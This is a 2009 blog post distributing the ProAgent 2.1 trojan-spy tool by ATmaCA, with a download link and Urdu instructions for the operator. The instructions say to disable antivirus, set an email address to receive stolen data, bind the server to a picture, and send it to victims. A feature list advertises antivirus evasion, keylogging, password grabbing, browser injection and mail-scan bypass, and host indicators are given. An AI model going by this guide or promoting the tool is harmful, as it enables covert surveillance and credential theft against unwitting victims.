Thursday, June 4, 2009

(Trojan-Spy.Win32.ProAgent.21)

ProAgent 2.1
(Trojan-Spy.Win32.ProAgent.21)

by ATmaCA

Written in C++

Released in October 2005

Made in Turkey

Download 


============================[ ProAgent v2.1 (11.08.2005) ]============================
                    How To Use Pro Agent (in urdu).
SaB say Pehle apna antivirus uninstall ya disable kareen.
kyon kay  yeh program torjan hota hai.Aur torjan computer
Kuch nahi hota.Yeh sirf victam ki information send karta hai.
ab aap e-mail main apna email adress dain. Jis par information aaye.
aur create server kar dain.app is ko kisi pic ka sath bhi attach kar 
kay server bana saktay hain is say victiom ko maloom nahin ho ga kay aap 
ussay hack kar rahay hain phir create server par click kar dain us folder 
main server ban jaye ga ab aap yeh file jis ko bhi send kareen gaye woh 
hackho jaye ga us ki information aap kay pass aa jaye gi.   
 
 
 
 
 
 
======================================================================================


[+] All the files made undetected against antiviruses.

[+] Virtual Keyboard Logging support added to Special Editions.

[+] MultiLanguage support added.

[+] Server extensions menu added.

[+] Advanved settings menu added.

[+] Shell icons support added into icons menu.

[+] Three characters limit for the extension of binded file improved. Any extensions
   with the any length will be accepted.

[+] 10 MB limit for the binded file improved. Any file with any size will be accepted.

[+] Grabbing more game-program serials support added.

[+] Anti-rootkit bypass methods improved.

[+] Grabbing FtpNow Passwords support added.

[+] Grabbing DeluxeFtp Passwords support added.

[+] Grabbing DeluxeFtp Pro Passwords support added.

[+] Grabbing Morpheus Passwords support added.

[+] Grabbing BitComet Passwords support added.

[+] Grabbing FireFly Passwords support added.

[+] Injection to Default browser method improved.

[+] Injection to Default E-Mail Client feature added.

[+] No-Injection feature added.

[+] Automatic Server Uninstall on specified date feature added.

[+] Delay Execution feature added in two options (after first restart or after a
   specified date).

[+] Server for once time only support added (If you select this option, server will
   send you reports only once than it will remove itself).

[+] Regularity of server logs improved.

[+] E-Mail report sending module made more stable.

[+] Added bypassing features for McAfee and Norton antivirus mail scan modules.

[+] And lots of improvements...




ATmaCA


Server:
dropped files:
c:\WINDOWS\system32\drivers\KeenSense.sys    Size: 16 bytes
c:\WINDOWS\system32\drivers\ksdevice.sys     Size: 16 bytes

added to registry:
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Ghisler
HKEY_CURRENT_USER\Software\mirabilis
HKEY_CURRENT_USER\Software\NirSoft
HKEY_CURRENT_USER\Software\RIT
HKEY_LOCAL_MACHINE\SOFTWARE\Ghisler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\&RQ
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian
HKEY_LOCAL_MACHINE\SOFTWARE\mirabilis
HKEY_LOCAL_MACHINE\SOFTWARE\Miranda
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "qservices"
data: C:\WINDOWS\qservice.exe
 
 
tested on Windows XP
August 26, 2005

MegaSecurity
Posted by at

1 comment:

  1. Gio VeOctober 25, 2009 at 8:55 AM

    Nice indeed!
    Best wishes from an Estonian living in Italy

    ReplyDelete

Subscribe to: Post Comments (Atom)